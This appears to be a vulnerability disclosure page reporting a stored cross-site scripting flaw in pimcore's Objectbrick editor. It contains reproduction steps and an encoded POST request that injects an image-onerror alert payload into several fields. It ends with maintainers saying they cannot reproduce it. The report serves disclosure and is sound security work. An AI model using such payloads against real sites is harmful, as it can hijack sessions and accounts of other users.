Cross-site Scripting (XSS) - Stored in pimcore/pimcore
Valid
Reported on
Nov 21st 2021
Description
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites.
Proof of Concept
// PoC.js
**Steps to reproduce :
1--> Go over settings --> Data Objects --> Objectbricks.
2--> Click Add or Edit a previous one .
3--> in the Parent PHP Class input , inject any payload .
4--> Click Save to get the alert .
**POST Request Example:
https://10.x-dev.pimcore.fun/admin/class/objectbrick-update
POST DATA: configuration=%7B%22childs%22%3A%5B%7B%22name%22%3A%22Layout%22%2C%22datatype%22%3A%22layout%22%2C%22fieldtype%22%3A%22panel%22%2C%22layout%22%3Anull%2C%22border%22%3Afalse%2C%22type%22%3Anull%2C%22region%22%3Anull%2C%22title%22%3A%22%22%2C%22width%22%3Anull%2C%22height%22%3Anull%2C%22collapsible%22%3Afalse%2C%22collapsed%22%3Afalse%2C%22bodyStyle%22%3A%22%22%2C%22permissions%22%3Anull%2C%22locked%22%3Afalse%2C%22icon%22%3Anull%2C%22labelWidth%22%3A100%2C%22labelAlign%22%3A%22left%22%2C%22childs%22%3A%5B%7B%22name%22%3A%22numberOfDoors%22%2C%22datatype%22%3A%22data%22%2C%22fieldtype%22%3A%22numeric%22%2C%22width%22%3A%22%22%2C%22defaultValue%22%3Anull%2C%22queryColumnType%22%3A%22double%22%2C%22columnType%22%3A%22double%22%2C%22integer%22%3Atrue%2C%22unsigned%22%3Atrue%2C%22minValue%22%3Anull%2C%22maxValue%22%3Anull%2C%22unique%22%3Afalse%2C%22decimalSize%22%3Anull%2C%22decimalPrecision%22%3Anull%2C%22title%22%3A%22Number%20Of%20Doors%22%2C%22tooltip%22%3A%22%22%2C%22mandatory%22%3Afalse%2C%22noteditable%22%3Afalse%2C%22index%22%3Afalse%2C%22locked%22%3Afalse%2C%22style%22%3A%22%22%2C%22permissions%22%3Anull%2C%22relationType%22%3Afalse%2C%22invisible%22%3Afalse%2C%22visibleGridView%22%3Afalse%2C%22visibleSearch%22%3Afalse%2C%22defaultValueGenerator%22%3A%22%22%2C%22childs%22%3Anull%7D%2C%7B%22name%22%3A%22numberOfSeats%22%2C%22datatype%22%3A%22data%22%2C%22fieldtype%22%3A%22numeric%22%2C%22width%22%3A%22%22%2C%22defaultValue%22%3Anull%2C%22queryColumnType%22%3A%22double%22%2C%22columnType%22%3A%22double%22%2C%22integer%22%3Atrue%2C%22unsigned%22%3Atrue%2C%22minValue%22%3Anull%2C%22maxValue%22%3Anull%2C%22unique%22%3Afalse%2C%22decimalSize%22%3Anull%2C%22decimalPrecision%22%3Anull%2C%22title%22%3A%22Number%20Of%20Seats%22%2C%22tooltip%22%3A%22%22%2C%22mandatory%22%3Afalse%2C%22noteditable%22%3Afalse%2C%22index%22%3Afalse%2C%22locked%22%3Afalse%2C%22style%22%3A%22%22%2C%22permissions%22%3Anull%2C%22relationType%22%3Afalse%2C%22invisible%22%3Afalse%2C%22visibleGridView%22%3Afalse%2C%22visibleSearch%22%3Afalse%2C%22defaultValueGenerator%22%3A%22%22%2C%22childs%22%3Anull%7D%2C%7B%22name%22%3A%22cargoCapacity%22%2C%22datatype%22%3A%22data%22%2C%22fieldtype%22%3A%22quantityValue%22%2C%22width%22%3Anull%2C%22unitWidth%22%3Anull%2C%22defaultValue%22%3Anull%2C%22defaultUnit%22%3A%224%22%2C%22validUnits%22%3A%5B%224%22%5D%2C%22decimalPrecision%22%3Anull%2C%22autoConvert%22%3Afalse%2C%22queryColumnType%22%3A%7B%22value%22%3A%22double%22%2C%22unit%22%3A%22bigint(20)%22%7D%2C%22columnType%22%3A%7B%22value%22%3A%22double%22%2C%22unit%22%3A%22bigint(20)%22%7D%2C%22title%22%3A%22Cargo%20Capacity%22%2C%22tooltip%22%3A%22%22%2C%22mandatory%22%3Afalse%2C%22noteditable%22%3Afalse%2C%22index%22%3Afalse%2C%22locked%22%3Afalse%2C%22style%22%3A%22%22%2C%22permissions%22%3Anull%2C%22relationType%22%3Afalse%2C%22invisible%22%3Afalse%2C%22visibleGridView%22%3Afalse%2C%22visibleSearch%22%3Afalse%2C%22defaultValueGenerator%22%3A%22%22%2C%22childs%22%3Anull%7D%5D%7D%5D%7D&values=%7B%22classDefinitions%22%3A%5B%7B%22classname%22%3A%22Car%22%2C%22fieldname%22%3A%22attributes%22%7D%5D%2C%22dao%22%3Anull%2C%22key%22%3A%22Bodywork%22%2C%22parentClass%22%3A%22xss%5C%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(5)%3E%22%2C%22implementsInterfaces%22%3A%22xss%5C%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(5)%3E%22%2C%22title%22%3A%22xss%5C%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(5)%3E%22%2C%22group%22%3A%22xss%5C%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(5)%3E%22%2C%22layoutDefinitions%22%3A%7B%22fieldtype%22%3A%22panel%22%2C%22layout%22%3Anull%2C%22border%22%3Afalse%2C%22name%22%3Anull%2C%22type%22%3Anull%2C%22region%22%3Anull%2C%22title%22%3Anull%2C%22width%22%3Anull%2C%22height%22%3Anull%2C%22collapsible%22%3Afalse%2C%22collapsed%22%3Afalse%2C%22bodyStyle%22%3Anull%2C%22datatype%22%3A%22layout%22%2C%22permissions%22%3Anull%2C%22childs%22%3A%5B%7B%22fieldtype%22%3A%22panel%22%2C%22layout%22%3Anull%2C%22border%22%3Afalse%2C%22name%22%3A%22Layout%22%2C%22type%22%3Anull%2C%22region%22%3Anull%2C%22title%22%3A%22%22%2C%22width%22%3Anull%2C%22height%22%3Anull%2C%22collapsible%22%3Afalse%2C%22collapsed%22%3Afalse%2C%22bodyStyle%22%3A%22%22%2C%22datatype%22%3A%22layout%22%2C%22permissions%22%3Anull%2C%22childs%22%3A%5B%7B%22fieldtype%22%3A%22numeric%22%2C%22width%22%3A%22%22%2C%22defaultValue%22%3Anull%2C%22queryColumnType%22%3A%22double%22%2C%22columnType%22%3A%22double%22%2C%22integer%22%3Atrue%2C%22unsigned%22%3Atrue%2C%22minValue%22%3Anull%2C%22maxValue%22%3Anull%2C%22unique%22%3Afalse%2C%22decimalSize%22%3Anull%2C%22decimalPrecision%22%3Anull%2C%22name%22%3A%22numberOfDoors%22%2C%22title%22%3A%22Number%20Of%20Doors%22%2C%22tooltip%22%3A%22%22%2C%22mandatory%22%3Afalse%2C%22noteditable%22%3Afalse%2C%22index%22%3Afalse%2C%22locked%22%3Afalse%2C%22style%22%3A%22%22%2C%22permissions%22%3Anull%2C%22datatype%22%3A%22data%22%2C%22relationType%22%3Afalse%2C%22invisible%22%3Afalse%2C%22visibleGridView%22%3Afalse%2C%22visibleSearch%22%3Afalse%2C%22defaultValueGenerator%22%3A%22%22%7D%2C%7B%22fieldtype%22%3A%22numeric%22%2C%22width%22%3A%22%22%2C%22defaultValue%22%3Anull%2C%22queryColumnType%22%3A%22double%22%2C%22columnType%22%3A%22double%22%2C%22integer%22%3Atrue%2C%22unsigned%22%3Atrue%2C%22minValue%22%3Anull%2C%22maxValue%22%3Anull%2C%22unique%22%3Afalse%2C%22decimalSize%22%3Anull%2C%22decimalPrecision%22%3Anull%2C%22name%22%3A%22numberOfSeats%22%2C%22title%22%3A%22Number%20Of%20Seats%22%2C%22tooltip%22%3A%22%22%2C%22mandatory%22%3Afalse%2C%22noteditable%22%3Afalse%2C%22index%22%3Afalse%2C%22locked%22%3Afalse%2C%22style%22%3A%22%22%2C%22permissions%22%3Anull%2C%22datatype%22%3A%22data%22%2C%22relationType%22%3Afalse%2C%22invisible%22%3Afalse%2C%22visibleGridView%22%3Afalse%2C%22visibleSearch%22%3Afalse%2C%22defaultValueGenerator%22%3A%22%22%7D%2C%7B%22fieldtype%22%3A%22quantityValue%22%2C%22width%22%3Anull%2C%22unitWidth%22%3Anull%2C%22defaultValue%22%3Anull%2C%22defaultUnit%22%3A%224%22%2C%22validUnits%22%3A%5B%224%22%5D%2C%22decimalPrecision%22%3Anull%2C%22autoConvert%22%3Afalse%2C%22queryColumnType%22%3A%7B%22value%22%3A%22double%22%2C%22unit%22%3A%22bigint(20)%22%7D%2C%22columnType%22%3A%7B%22value%22%3A%22double%22%2C%22unit%22%3A%22bigint(20)%22%7D%2C%22name%22%3A%22cargoCapacity%22%2C%22title%22%3A%22Cargo%20Capacity%22%2C%22tooltip%22%3A%22%22%2C%22mandatory%22%3Afalse%2C%22noteditable%22%3Afalse%2C%22index%22%3Afalse%2C%22locked%22%3Afalse%2C%22style%22%3A%22%22%2C%22permissions%22%3Anull%2C%22datatype%22%3A%22data%22%2C%22relationType%22%3Afalse%2C%22invisible%22%3Afalse%2C%22visibleGridView%22%3Afalse%2C%22visibleSearch%22%3Afalse%2C%22defaultValueGenerator%22%3A%22%22%7D%5D%2C%22locked%22%3Afalse%2C%22icon%22%3Anull%2C%22labelWidth%22%3A100%2C%22labelAlign%22%3A%22left%22%7D%5D%2C%22locked%22%3Afalse%2C%22icon%22%3Anull%2C%22labelWidth%22%3A100%2C%22labelAlign%22%3A%22left%22%7D%2C%22generateTypeDeclarations%22%3Atrue%2C%22fieldDefinitions%22%3A%7B%22numberOfDoors%22%3A%7B%22fieldtype%22%3A%22numeric%22%2C%22width%22%3A%22%22%2C%22defaultValue%22%3Anull%2C%22queryColumnType%22%3A%22double%22%2C%22columnType%22%3A%22double%22%2C%22integer%22%3Atrue%2C%22unsigned%22%3Atrue%2C%22minValue%22%3Anull%2C%22maxValue%22%3Anull%2C%22unique%22%3Afalse%2C%22decimalSize%22%3Anull%2C%22decimalPrecision%22%3Anull%2C%22name%22%3A%22numberOfDoors%22%2C%22title%22%3A%22Number%20Of%20Doors%22%2C%22tooltip%22%3A%22%22%2C%22mandatory%22%3Afalse%2C%22noteditable%22%3Afalse%2C%22index%22%3Afalse%2C%22locked%22%3Afalse%2C%22style%22%3A%22%22%2C%22permissions%22%3Anull%2C%22datatype%22%3A%22data%22%2C%22relationType%22%3Afalse%2C%22invisible%22%3Afalse%2C%22visibleGridView%22%3Afalse%2C%22visibleSearch%22%3Afalse%2C%22defaultValueGenerator%22%3A%22%22%7D%2C%22numberOfSeats%22%3A%7B%22fieldtype%22%3A%22numeric%22%2C%22width%22%3A%22%22%2C%22defaultValue%22%3Anull%2C%22queryColumnType%22%3A%22double%22%2C%22columnType%22%3A%22double%22%2C%22integer%22%3Atrue%2C%22unsigned%22%3Atrue%2C%22minValue%22%3Anull%2C%22maxValue%22%3Anull%2C%22unique%22%3Afalse%2C%22decimalSize%22%3Anull%2C%22decimalPrecision%22%3Anull%2C%22name%22%3A%22numberOfSeats%22%2C%22title%22%3A%22Number%20Of%20Seats%22%2C%22tooltip%22%3A%22%22%2C%22mandatory%22%3Afalse%2C%22noteditable%22%3Afalse%2C%22index%22%3Afalse%2C%22locked%22%3Afalse%2C%22style%22%3A%22%22%2C%22permissions%22%3Anull%2C%22datatype%22%3A%22data%22%2C%22relationType%22%3Afalse%2C%22invisible%22%3Afalse%2C%22visibleGridView%22%3Afalse%2C%22visibleSearch%22%3Afalse%2C%22defaultValueGenerator%22%3A%22%22%7D%2C%22cargoCapacity%22%3A%7B%22fieldtype%22%3A%22quantityValue%22%2C%22width%22%3Anull%2C%22unitWidth%22%3Anull%2C%22defaultValue%22%3Anull%2C%22defaultUnit%22%3A%224%22%2C%22validUnits%22%3A%5B%224%22%5D%2C%22decimalPrecision%22%3Anull%2C%22autoConvert%22%3Afalse%2C%22queryColumnType%22%3A%7B%22value%22%3A%22double%22%2C%22unit%22%3A%22bigint(20)%22%7D%2C%22columnType%22%3A%7B%22value%22%3A%22double%22%2C%22unit%22%3A%22bigint(20)%22%7D%2C%22name%22%3A%22cargoCapacity%22%2C%22title%22%3A%22Cargo%20Capacity%22%2C%22tooltip%22%3A%22%22%2C%22mandatory%22%3Afalse%2C%22noteditable%22%3Afalse%2C%22index%22%3Afalse%2C%22locked%22%3Afalse%2C%22style%22%3A%22%22%2C%22permissions%22%3Anull%2C%22datatype%22%3A%22data%22%2C%22relationType%22%3Afalse%2C%22invisible%22%3Afalse%2C%22visibleGridView%22%3Afalse%2C%22visibleSearch%22%3Afalse%2C%22defaultValueGenerator%22%3A%22%22%7D%7D%2C%22blockedVarsForExport%22%3A%5B%5D%2C%22isWriteable%22%3Atrue%2C%22textfield-1202-inputEl%22%3A%22Car%22%2C%22fieldname%22%3A%22attributes%22%7D&key=Bodywork&title=xss%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(5)%3E&group=xss%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(5)%3E
Impact
This vulnerability is capable of...steal user session , takeover user account , make redirect user to attacker controlled site //
We are processing your report and will contact the
pimcore
team within 24 hours.
2 years ago
We have contacted a member of the
pimcore
team and are waiting to hear back
2 years ago
Hi,
Could not reproduce the issue as the Parent Class value is validated in the save handler of Objectbricks Definition here.
thanks, Divesh
I'm sure this is reproduce-able , you can just follow up my steps to get the alert .
Best,
We have sent a
follow up to the
pimcore
team.
We will try again in 7 days.
2 years ago
Could you please share the payload that you are using?
thanks, Divesh
We have sent a
second
follow up to the
pimcore
team.
We will try again in 10 days.
2 years ago
to join this conversation